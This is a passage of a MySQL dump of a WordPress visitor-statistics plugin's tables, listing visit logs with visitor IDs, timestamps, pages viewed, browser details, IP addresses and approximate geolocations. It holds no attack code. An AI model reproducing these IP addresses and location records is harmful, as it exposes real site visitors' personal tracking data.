11:25:32',0,0,1,9,9,1,4,'en-US',1,'Desktop',12,'11:25:32',0,196,20,1,0,0,0,0,0,0,0,0,0,'Dakar',196,14.670800,-17.438100,0),(108,1,'b7583e6cfe0b4373','2021-08-15 12:00:16','4ce6f62e4705134c','197.215.218.250','0','2021-08-15 12:00:16',0,0,1,5,5,1,0,'en-US',2,'Desktop',8,'12:00:13',0,15,20,1,0,0,0,0,1,0,0,0,0,'',126,6.500000,-9.500000,0),(109,1,'2a508f3d6be1b31c','2021-08-15 12:58:41','c8662db60ec8ad1d','41.57.95.17','0','2021-08-15 12:58:41',0,0,1,79,79,1,0,'en',2,'Mobile',10,'05:58:38',0,3,26,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(110,1,'01154596668d632c','2021-08-15 13:30:53','a830ef9e6e86b540','41.212.85.196','0','2021-08-15 13:18:07',0,0,1,93,93,3,4,'en-US',2,'Mobile',10,'16:18:04',0,798,39,1,0,0,0,0,0,0,0,0,0,'Nairobi',116,-1.283300,36.816700,0),(111,1,'469c35dceb756455','2021-08-15 17:02:15','4ce6f62e4705134c','103.142.80.132','0','2021-08-15 17:02:15',0,0,1,95,95,1,4,'en-US',2,'Desktop',8,'23:02:11',0,1515,33,1,0,0,0,0,1,0,0,0,0,'Not found',0,0.000000,0.000000,0),(112,1,'84a3a08969d2eb8a','2021-08-15 17:42:04','5319cd1fa59d2f89','41.57.95.203','0','2021-08-15 17:41:08',0,0,1,3,3,1,4,'en-US',1,'Desktop',7,'10:41:28',0,166,20,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(113,1,'4eb77274864058b3','2021-08-15 17:56:57','4e9255cedec79344','175.44.42.117','0','2021-08-15 17:56:57',0,0,1,5,5,1,96,'en-US',4,'Mobile',11,'13:56:56',0,0,43,1,0,0,0,0,0,0,0,0,0,'Putian',46,24.987800,118.498300,0),(114,1,'78f2eaf2450f5e17','2021-08-15 19:31:29','c8662db60ec8ad1d','41.191.107.145','0','2021-08-15 19:31:29',0,0,1,1,1,1,0,'en-US',2,'Mobile',10,'12:31:23',0,0,26,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(115,1,'14ec824eb56c0a61','2021-08-15 19:34:13','23971f8429f12b1a','41.191.107.145','0','2021-08-15 19:31:34',0,0,1,1,97,2,0,'en-US',2,'Mobile',10,'19:31:31',0,480,45,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(116,1,'eed025b413230de2','2021-08-15 19:52:16','5f24e765daff4328','41.191.107.49','0','2021-08-15 19:50:12',0,0,1,15,30,4,10,'en-US',1,'Desktop',8,'19:50:09',0,246,33,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(117,1,'35ade4f4cf9ae720','2021-08-15 20:39:24','4ce6f62e4705134c','37.164.47.205','0','2021-08-15 20:39:24',0,0,1,1,1,1,4,'es-US',2,'Desktop',8,'22:39:23',0,274,22,1,0,0,0,0,1,0,0,0,0,'',76,48.858200,2.338700,0),(118,1,'54aeeaa305c2d07b','2021-08-15 21:04:54','348a0f9fb1616a61','116.179.37.194','0','2021-08-15 21:04:54',0,0,1,5,5,1,0,'zh-CN',14,'Desktop',15,'05:04:52',0,0,46,1,0,0,0,0,0,0,0,0,0,'',46,34.772500,113.726600,0),(119,1,'3f5d47dc78b232ef','2021-08-15 21:04:54','3bead6cd0e71982b','116.179.37.174','0','2021-08-15 21:04:54',0,0,1,5,5,1,0,'zh-CN',4,'Mobile',11,'05:04:52',0,0,43,1,0,0,0,0,0,0,0,0,0,'',46,34.772500,113.726600,0),(120,1,'80d4cd36e25c22f8','2021-08-15 21:10:14','c8662db60ec8ad1d','41.57.95.117','0','2021-08-15 21:10:14',0,0,1,1,1,1,0,'en-US',2,'Mobile',10,'14:10:10',0,0,26,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(121,1,'f610306237ef4590','2021-08-15 21:12:34','a7d8596e63903721','41.57.95.117','0','2021-08-15 21:10:19',0,0,1,1,2,2,0,'en-US',2,'Mobile',10,'21:10:17',0,136,39,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(122,1,'69d2e21d0ab67c12','2021-08-15 21:18:32','ded9f78b24550499','40.77.202.157','0','2021-08-15 21:18:32',0,0,1,100,100,1,0,'en-US',13,'Desktop',12,'14:18:30',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(123,1,'c82e8c56bf651386','2021-08-15 21:55:23','ded9f78b24550499','40.77.202.136','0','2021-08-15 21:55:23',0,0,1,30,30,1,0,'en-US',13,'Desktop',12,'14:55:21',0,0,2,1,0,0,0,0,0,0,0,0,0,'',236,37.751000,-97.822000,0),(124,1,'944656e1fbbcd141','2021-08-16 17:12:15','4ce6f62e4705134c','::1','38','2021-08-16 01:40:48',0,0,1,5,5,28,0,'en-US',2,'Desktop',8,'01:40:47',0,78070,19,1,0,0,0,0,1,0,0,0,0,'Not found',0,0.000000,0.000000,0),(125,1,'944656e1fbbcd141','2021-08-17 14:30:41','4ce6f62e4705134c','::1','38','2021-08-17 10:25:10',0,0,1,5,8,63,0,'en-US',2,'Desktop',8,'10:25:01',0,14777,19,1,0,0,0,0,1,0,0,0,0,'Not found',0,0.000000,0.000000,0),(126,1,'944656e1fbbcd141','2021-08-17 10:25:10','4ce6f62e4705134c','::1','38','2021-08-17 10:25:10',0,0,1,5,5,28,0,'en-US',2,'Desktop',8,'10:24:58',0,78070,19,1,0,0,0,0,1,0,0,0,0,'Not found',0,0.000000,0.000000,0);
/*!40000 ALTER TABLE `wp_wsm_loguniquevisit` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_logvisit`
--

DROP TABLE IF EXISTS `wp_wsm_logvisit`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_logvisit` (
  `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT,
  `siteId` int(10) unsigned NOT NULL,
  `visitorId` varchar(20) NOT NULL,
  `visitId` bigint(10) unsigned NOT NULL,
  `refererUrlId` int(10) unsigned DEFAULT '0',
  `keyword` varchar(200) DEFAULT NULL,
  `serverTime` datetime NOT NULL,
  `timeSpentRef` int(11) unsigned NOT NULL,
  `URLId` int(10) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `index_visitId` (`visitId`),
  KEY `index_siteId_serverTime` (`siteId`,`serverTime`)
) ENGINE=InnoDB AUTO_INCREMENT=274 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_logvisit`
--

LOCK TABLES `wp_wsm_logvisit` WRITE;
/*!40000 ALTER TABLE `wp_wsm_logvisit` DISABLE KEYS */;
INSERT INTO `wp_wsm_logvisit` VALUES (1,1,'118a62e5107dd764',1,0,'-','2021-08-12 12:47:39',47,1),(2,1,'f5cea1b341f5eafa',2,4,'-','2021-08-12 13:05:22',1001,3),(3,1,'0dd2293c2a15c5fa',3,0,'-','2021-08-12 13:16:45',0,1),(4,1,'6453d95a8a5387f4',4,0,'-','2021-08-12 13:16:48',0,1),(5,1,'6453d95a8a5387f4',4,0,'-','2021-08-12 13:19:05',15,1),(6,1,'04cdc12042c4f67f',5,0,'-','2021-08-12 13:21:30',0,6),(7,1,'f5cea1b341f5eafa',2,4,'-','2021-08-12 13:22:05',3,3),(8,1,'b544bf0e99817d4e',6,4,'-','2021-08-12 13:41:40',1800,8),(9,1,'b6bdd91df3c41c68',7,0,'-','2021-08-12 14:26:59',1800,9),(10,1,'ec74cc298e6417a3',8,0,'-','2021-08-12 14:31:43',0,6),(11,1,'26f38ada2bbb1fbd',9,10,'-','2021-08-12 14:56:56',461,1),(12,1,'e7cdd3ea5571d92c',10,0,'-','2021-08-12 15:07:34',59,11),(13,1,'26f38ada2bbb1fbd',9,10,'-','2021-08-12 15:07:53',16,12),(14,1,'e7cdd3ea5571d92c',10,0,'-','2021-08-12 15:08:35',61,11),(15,1,'c0a9314dc63a7009',11,0,'-','2021-08-12 15:16:50',74,9),(16,1,'cf87b32218b0371c',12,0,'-','2021-08-12 15:18:15',0,15),(17,1,'c0a9314dc63a7009',11,0,'-','2021-08-12 15:18:28',98,9),(18,1,'9c4f066647846cdc',13,17,'-','2021-08-12 15:44:41',163,16),(19,1,'b544bf0e99817d4e',6,4,'-','2021-08-12 15:54:51',87,8),(20,1,'b544bf0e99817d4e',6,4,'-','2021-08-12 16:00:24',191,8),(21,1,'b544bf0e99817d4e',6,4,'-','2021-08-12 16:03:42',367,8),(22,1,'b544bf0e99817d4e',6,4,'-','2021-08-12 16:09:58',91,8),(23,1,'b544bf0e99817d4e',6,4,'-','2021-08-12 16:11:33',95,8),(24,1,'dc7ad7679c596808',14,4,'-','2021-08-12 17:00:14',1800,22),(25,1,'04cdc12042c4f67f',5,0,'-','2021-08-12 17:55:08',1800,6),(26,1,'f3b6f729d49c8bd1',15,0,'-','2021-08-12 18:15:00',895,6),(27,1,'e403afa26d31fe73',16,0,'-','2021-08-12 18:53:16',74,6),(28,1,'b6bdd91df3c41c68',7,0,'-','2021-08-12 19:11:32',1800,9),(29,1,'cbcf9845916ee09f',17,0,'-','2021-08-12 19:18:33',0,24),(30,1,'e14e00eab3c31a86',18,4,'-','2021-08-12 19:36:25',46,3),(31,1,'79573a4e844e785f',19,0,'-','2021-08-12 19:41:18',4,3),(32,1,'b6bdd91df3c41c68',7,0,'-','2021-08-12 19:46:09',1800,9),(33,1,'b6bdd91df3c41c68',7,0,'-','2021-08-12 19:46:14',3,6),(34,1,'b6bdd91df3c41c68',7,0,'-','2021-08-12 19:46:20',15,8),(35,1,'2d05fafe51eb7852',20,0,'-','2021-08-12 20:19:17',0,25),(36,1,'16d39bfe8c2a779e',21,0,'-','2021-08-12 20:29:43',0,26),(37,1,'f1199353911d7977',22,4,'-','2021-08-12 20:42:57',105,27),(38,1,'f1199353911d7977',22,4,'-','2021-08-12 20:45:07',18,27),(39,1,'c2b6249eafe7613d',23,0,'-','2021-08-12 20:55:30',30,1),(40,1,'13051adba4f13ad8',24,0,'-','2021-08-12 21:36:01',0,29),(41,1,'d68e79dcc3754725',25,0,'-','2021-08-12 21:36:56',0,29),(42,1,'94ea57bac25a930e',26,0,'-','2021-08-12 23:06:36',0,12),(43,1,'2c3f163cf4e456c6',27,0,'-','2021-08-12 23:26:09',0,1),(44,1,'97bc44393615646f',28,0,'-','2021-08-13 01:07:20',0,30),(45,1,'16eac28561f18e05',29,31,'-','2021-08-13 03:28:48',75,1),(46,1,'16eac28561f18e05',29,31,'-','2021-08-13 03:30:14',951,1),(47,1,'16eac28561f18e05',29,31,'-','2021-08-13 03:46:08',262,1),(48,1,'927a8dddfa409b1c',30,0,'-','2021-08-13 03:48:45',0,32),(49,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 04:36:54',60,8),(50,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 04:38:06',499,8),(51,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 05:10:59',1800,34),(52,1,'de335d12e831eb9d',32,4,'-','2021-08-13 05:35:51',0,35),(53,1,'69568822807801b1',33,0,'-','2021-08-13 06:08:34',0,36),(54,1,'b6bdd91df3c41c68',34,0,'-','2021-08-13 06:51:16',0,0),(55,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 06:52:50',247,34),(56,1,'9e863d032d64e958',35,4,'-','2021-08-13 07:03:33',0,37),(57,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 07:08:32',127,34),(58,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 07:10:40',21,34),(59,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 07:10:41',194,38),(60,1,'66c16028e4fc14b1',36,4,'-','2021-08-13 08:08:22',296,39),(61,1,'66c16028e4fc14b1',36,4,'-','2021-08-13 08:13:20',296,39),(62,1,'66c16028e4fc14b1',36,4,'-','2021-08-13 08:13:26',52,9),(63,1,'5e7b6b1236e7f21e',37,0,'-','2021-08-13 08:15:25',0,5),(64,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:21:14',317,40),(65,1,'62ce99a7c7a87750',39,42,'-','2021-08-13 08:28:43',20,41),(66,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:48:26',45,5),(67,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:49:16',75,43),(68,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:50:42',60,5),(69,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:51:50',16,30),(70,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:52:20',346,16),(71,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:58:24',15,30),(72,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:58:49',11,44),(73,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:59:03',121,29),(74,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:01:18',3,44),(75,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:01:24',60,45),(76,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:02:26',3,44),(77,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:02:32',60,46),(78,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:03:47',31,44),(79,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:04:31',75,47),(80,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:05:57',15,44),(81,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:06:20',23,30),(82,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:06:32',12,5),(83,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:07:38',59,5),(84,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:09:03',9,5),(85,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:09:26',1800,40),(86,1,'faa64bc95737a19b',40,4,'-','2021-08-13 09:22:37',0,48),(87,1,'10f5e5a30344c4c5',41,0,'-','2021-08-13 09:31:11',0,36),(88,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:42:57',1800,5),(89,1,'a832dde1b73dad9b',42,10,'-','2021-08-13 10:42:23',1326,1),(90,1,'dc5e292012f9fb9d',43,49,'-','2021-08-13 11:02:01',0,40),(91,1,'ffcb56100c11a382',44,10,'-','2021-08-13 11:05:19',924,50),(92,1,'d2f6bbcc92e39cde',45,0,'-','2021-08-13 11:14:29',1800,25),(93,1,'f3f15963ae57a7f2',46,10,'-','2021-08-13 11:15:16',135,52),(94,1,'f3f15963ae57a7f2',46,10,'-','2021-08-13 11:31:40',75,52),(95,1,'25e9e59d695393ac',47,4,'-','2021-08-13 11:31:46',0,53),(96,1,'2bc670b86a9dd752',48,10,'-','2021-08-13 11:36:25',26,1),(97,1,'25e9e59d695393ac',47,4,'-','2021-08-13 11:36:55',120,53),(98,1,'25e9e59d695393ac',47,4,'-','2021-08-13 11:39:27',152,53),(99,1,'f3f15963ae57a7f2',46,10,'-','2021-08-13 11:54:52',1391,52),(100,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:09:37',30,38),(101,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:10:39',88,38),(102,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:12:22',16,5),(103,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:12:55',4,38),(104,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:13:35',16,5),(105,1,'97bd1d8707be45f3',49,0,'-','2021-08-13 12:14:03',75,56),(106,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:14:06',222,38),(107,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:18:00',235,5),(108,1,'af6cde098b9eb2ae',50,10,'-','2021-08-13 12:18:49',17,1),(109,1,'39eb0453e33558de',51,0,'-','2021-08-13 12:42:16',0,58),(110,1,'ffcb56100c11a382',44,10,'-','2021-08-13 13:46:56',1800,50),(111,1,'443e17d9074b2205',52,4,'-','2021-08-13 13:48:43',55,1),(112,1,'443e17d9074b2205',52,4,'-','2021-08-13 13:49:48',10,1),(113,1,'443e17d9074b2205',52,4,'-','2021-08-13 13:52:38',108,1),(114,1,'443e17d9074b2205',52,4,'-','2021-08-13 13:55:03',116,1),(115,1,'6c0d1fcac162a302',53,17,'-','2021-08-13 13:59:38',8,61),(116,1,'6c0d1fcac162a302',53,17,'-','2021-08-13 13:59:49',60,8),(117,1,'6c0d1fcac162a302',53,17,'-','2021-08-13 14:00:55',66,61),(118,1,'b9a1cc9e53471194',54,0,'-','2021-08-13 15:07:54',0,8),(119,1,'f73af3570c03833e',55,4,'-','2021-08-13 17:41:27',30,34),(120,1,'5d98ffe7525f1254',56,0,'-','2021-08-13 20:04:14',0,50),(121,1,'2e09f959ce909e70',57,0,'-','2021-08-13 20:28:06',0,52),(122,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:07:18',61,1),(123,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:08:20',15,1),(124,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:09:35',18,1),(125,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:09:38',356,30),(126,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:15:39',358,30),(127,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:15:41',75,1),(128,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:17:05',14,1),(129,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:17:47',42,30),(130,1,'596252a0747c5d04',59,0,'-','2021-08-14 00:45:19',0,64),(131,1,'6565e9301cacfc54',60,0,'-','2021-08-14 01:47:02',0,65),(132,1,'52504b16aa88920a',61,0,'-','2021-08-14 03:42:24',0,66),(133,1,'58dd87a255484962',62,0,'-','2021-08-14 03:58:31',98,67),(134,1,'5d742a932d9b935e',63,0,'-','2021-08-14 08:45:21',0,30),(135,1,'851e3a7fbb3221f4',64,42,'-','2021-08-14 09:16:14',61,69),(136,1,'851e3a7fbb3221f4',64,42,'-','2021-08-14 09:17:28',75,25),(137,1,'851e3a7fbb3221f4',64,42,'-','2021-08-14 09:18:51',9,69),(138,1,'851e3a7fbb3221f4',64,42,'-','2021-08-14 09:24:28',1,25),(139,1,'30a0d1dbfe8ac4b8',65,31,'-','2021-08-14 09:48:52',0,70),(140,1,'54582b98ec3f0bad',66,71,'-','2021-08-14 10:50:04',0,5),(141,1,'53247ff94a6baa25',67,0,'-','2021-08-14 11:30:08',0,72),(142,1,'25ed96afa3180ed7',68,4,'-','2021-08-14 12:38:32',29,73),(143,1,'cbe63f5f35bb6b7c',69,4,'-','2021-08-14 12:44:36',107,39),(144,1,'a5f620902a18006e',70,75,'-','2021-08-14 13:14:41',0,74),(145,1,'ec93d559f345ef4f',71,42,'-','2021-08-14 13:22:57',0,69),(146,1,'d2f6bbcc92e39cde',72,0,'-','2021-08-14 13:56:46',0,0),(147,1,'4698baf817679530',73,0,'-','2021-08-14 16:12:07',0,39),(148,1,'f8e69f346f692304',74,4,'-','2021-08-14 16:17:32',15,76),(149,1,'1eee6a1beaa9d6cd',75,0,'-','2021-08-14 16:17:36',6,5),(150,1,'1eee6a1beaa9d6cd',75,0,'-','2021-08-14 16:17:48',1485,9),(151,1,'f11bda5756096970',76,0,'-','2021-08-14 17:51:00',0,77),(152,1,'62ac29814bddba7e',77,0,'-','2021-08-14 21:41:07',0,78),(153,1,'7f70394071d87bbf',78,4,'-','2021-08-14 22:23:48',0,70),(154,1,'2fd6daf60a9d540e',79,4,'-','2021-08-14 22:46:01',135,79),(155,1,'044bb3ca6f82588e',80,4,'-','2021-08-14 22:47:45',0,27),(156,1,'2fd6daf60a9d540e',79,4,'-','2021-08-14 22:48:22',141,79),(157,1,'e33b9b2d283372be',81,0,'-','2021-08-14 23:12:52',0,81),(158,1,'6d6c8d89cd1d69c8',82,4,'-','2021-08-14 23:21:54',710,1),(159,1,'319fc30070a83d31',83,0,'-','2021-08-14 23:23:27',0,34),(160,1,'ff3e561ef4799980',84,0,'-','2021-08-15 00:21:37',0,82),(161,1,'7f70394071d87bbf',85,4,'-','2021-08-15 00:42:24',0,70),(162,1,'d8621baf679cbdbd',86,0,'-','2021-08-15 01:25:34',0,30),(163,1,'1e4c0350fe175a9a',87,0,'-','2021-08-15 01:43:56',0,30),(164,1,'6b9be6cfa7c1c9ba',88,0,'-','2021-08-15 02:43:45',0,83),(165,1,'25ed96afa3180ed7',89,4,'-','2021-08-15 03:30:06',31,73),(166,1,'9b8e691ceb66d653',90,0,'-','2021-08-15 04:07:08',0,30),(167,1,'588835bb4aef61d0',91,0,'-','2021-08-15 04:08:07',0,84),(168,1,'6ff908afad68c9b0',92,0,'-','2021-08-15 04:17:13',0,77),(169,1,'27fde2a348f8d20a',93,4,'-','2021-08-15 04:31:15',0,77),(170,1,'6086ca20a0b9edd6',94,4,'-','2021-08-15 05:07:24',135,61),(171,1,'6086ca20a0b9edd6',94,4,'-','2021-08-15 05:09:51',53,61),(172,1,'7d6ee8e8d4b78679',95,4,'-','2021-08-15 05:15:36',2,86),(173,1,'7d6ee8e8d4b78679',95,4,'-','2021-08-15 05:16:39',8,86),(174,1,'de4ca55714767982',96,0,'-','2021-08-15 05:47:01',0,88),(175,1,'56ca87dbec5f23a3',97,0,'-','2021-08-15 07:19:57',0,1),(176,1,'77b3fb9392271f37',98,0,'-','2021-08-15 07:39:55',0,89),(177,1,'3e514f571887142c',99,4,'-','2021-08-15 08:14:01',42,27),(178,1,'5235c3903840a0ad',100,0,'-','2021-08-15 08:46:46',0,76),(179,1,'b544bf0e99817d4e',101,0,'-','2021-08-15 09:12:51',0,0),(180,1,'edd10b54c8d896c8',102,0,'-','2021-08-15 10:05:59',0,91),(181,1,'17429cc38c623408',103,0,'-','2021-08-15 10:13:02',0,92),(182,1,'648449973ac5b8b4',104,0,'-','2021-08-15 10:13:26',0,93),(183,1,'6c9f9974aea0e57f',105,4,'-','2021-08-15 10:23:56',10,15),(184,1,'775a2e1675a88ec6',106,0,'-','2021-08-15 10:31:15',0,94),(185,1,'1e2c7ce3869af143',107,4,'-','2021-08-15 11:25:31',195,9),(186,1,'b7583e6cfe0b4373',108,0,'-','2021-08-15 12:00:16',14,5),(187,1,'2a508f3d6be1b31c',109,0,'-','2021-08-15 12:58:41',2,79),(188,1,'01154596668d632c',110,4,'-','2021-08-15 13:18:06',180,93),(189,1,'01154596668d632c',110,4,'-','2021-08-15 13:21:08',181,93),(190,1,'01154596668d632c',110,4,'-','2021-08-15 13:30:53',31,93),(191,1,'469c35dceb756455',111,4,'-','2021-08-15 17:02:13',1514,95),(192,1,'84a3a08969d2eb8a',112,4,'-','2021-08-15 17:41:08',109,3),(193,1,'4eb77274864058b3',113,96,'-','2021-08-15 17:56:57',0,5),(194,1,'78f2eaf2450f5e17',114,0,'-','2021-08-15 19:31:28',0,1),(195,1,'14ec824eb56c0a61',115,0,'-','2021-08-15 19:31:34',155,1),(196,1,'14ec824eb56c0a61',115,0,'-','2021-08-15 19:34:13',320,1),(197,1,'eed025b413230de2',116,10,'-','2021-08-15 19:50:11',59,15),(198,1,'eed025b413230de2',116,10,'-','2021-08-15 19:51:20',2,15),(199,1,'eed025b413230de2',116,10,'-','2021-08-15 19:51:40',30,8),(200,1,'eed025b413230de2',116,10,'-','2021-08-15 19:52:16',121,30),(201,1,'35ade4f4cf9ae720',117,4,'-','2021-08-15 20:39:24',273,1),(202,1,'54aeeaa305c2d07b',118,0,'-','2021-08-15 21:04:53',0,5),(203,1,'3f5d47dc78b232ef',119,0,'-','2021-08-15 21:04:54',0,5),(204,1,'80d4cd36e25c22f8',120,0,'-','2021-08-15 21:10:14',0,1),(205,1,'f610306237ef4590',121,0,'-','2021-08-15 21:10:19',105,1),(206,1,'f610306237ef4590',121,0,'-','2021-08-15 21:12:17',17,1),(207,1,'69d2e21d0ab67c12',122,0,'-','2021-08-15 21:18:32',0,100),(208,1,'c82e8c56bf651386',123,0,'-','2021-08-15 21:55:23',0,30),(209,1,'944656e1fbbcd141',124,0,'-','2021-08-16 01:40:47',60,5),(210,1,'944656e1fbbcd141',124,0,'-','2021-08-16 01:51:18',33,101),(211,1,'944656e1fbbcd141',124,0,'-','2021-08-16 01:52:04',1800,5),(212,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:23:03',114,5),(213,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:25:31',474,103),(214,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:33:27',45,5),(215,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:35:00',81,103),(216,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:36:25',220,5),(217,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:40:10',92,5),(218,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:41:44',158,5),(219,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:46:49',165,105),(220,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:49:38',213,5),(221,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:53:52',56,5),(222,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:55:10',77,5),(223,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:56:27',65,5),(224,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:58:06',20,5),(225,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:58:28',29,40),(226,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:58:59',13,109),(227,1,'944656e1fbbcd141',124,0,'-','2021-08-16 11:59:17',2,5),(228,1,'944656e1fbbcd141',124,0,'-','2021-08-16 12:00:02',8,109),(229,1,'944656e1fbbcd141',124,0,'-','2021-08-16 12:00:04',24,40),(230,1,'944656e1fbbcd141',124,0,'-','2021-08-16 12:00:35',45,5),(231,1,'944656e1fbbcd141',124,0,'-','2021-08-16 12:01:31',11,40),(232,1,'944656e1fbbcd141',124,0,'-','2021-08-16 12:01:43',1800,5),(233,1,'944656e1fbbcd141',124,0,'-','2021-08-16 15:09:44',16,5),(234,1,'944656e1fbbcd141',124,0,'-','2021-08-16 15:10:53',29,5),(235,1,'944656e1fbbcd141',124,0,'-','2021-08-16 15:12:20',1800,5),(236,1,'944656e1fbbcd141',124,0,'-','2021-08-16 17:12:14',1800,5),(237,1,'944656e1fbbcd141',126,0,'-','2021-08-17 10:24:59',0,0),(238,1,'944656e1fbbcd141',125,0,'-','2021-08-17 10:25:01',0,0),(239,1,'944656e1fbbcd141',125,0,'-','2021-08-17 10:59:27',646,40),(240,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:10:16',649,5),(241,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:10:18',265,40),(242,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:14:45',266,40),(243,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:14:46',0,110),(244,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:14:47',89,109),(245,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:16:20',94,109),(246,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:16:22',27,111),(247,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:16:51',46,30),(248,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:18:10',32,5),(249,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:18:45',10,30),(250,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:19:55',15,30),(251,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:21:03',30,30),(252,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:22:31',16,30),(253,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:23:59',55,30),(254,1,'944656e1fbbcd141',125,0,'-','2021-08-17 11:26:46',1800,8),(255,1,'944656e1fbbcd141',125,0,'-','2021-08-17 12:02:10',131,114),(256,1,'944656e1fbbcd141',125,0,'-','2021-08-17 12:04:33',1061,114),(257,1,'944656e1fbbcd141',125,0,'-','2021-08-17 12:26:21',199,8),(258,1,'944656e1fbbcd141',125,0,'-','2021-08-17 12:29:46',106,114),(259,1,'944656e1fbbcd141',125,0,'-','2021-08-17 12:31:38',100,8),(260,1,'944656e1fbbcd141',125,0,'-','2021-08-17 12:33:20',3,8),(261,1,'944656e1fbbcd141',125,0,'-','2021-08-17 12:33:46',590,30),(262,1,'944656e1fbbcd141',125,0,'-','2021-08-17 12:43:45',1127,8),(263,1,'944656e1fbbcd141',125,0,'-','2021-08-17 13:02:34',77,8),(264,1,'944656e1fbbcd141',125,0,'-','2021-08-17 13:03:55',34,8),(265,1,'944656e1fbbcd141',125,0,'-','2021-08-17 13:05:02',45,8),(266,1,'944656e1fbbcd141',125,0,'-','2021-08-17 13:05:03',14,30),(267,1,'944656e1fbbcd141',125,0,'-','2021-08-17 13:05:18',1799,118),(268,1,'944656e1fbbcd141',125,0,'-','2021-08-17 13:39:49',526,8),(269,1,'944656e1fbbcd141',125,0,'-','2021-08-17 13:48:40',530,118),(270,1,'944656e1fbbcd141',125,0,'-','2021-08-17 13:48:42',266,8),(271,1,'944656e1fbbcd141',125,0,'-','2021-08-17 13:53:13',1344,8),(272,1,'944656e1fbbcd141',125,0,'-','2021-08-17 14:16:28',845,8),(273,1,'944656e1fbbcd141',125,0,'-','2021-08-17 14:30:40',45,8);
/*!40000 ALTER TABLE `wp_wsm_logvisit` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Temporary table structure for view `wp_wsm_monthWiseBounce`
--

DROP TABLE IF EXISTS `wp_wsm_monthWiseBounce`;
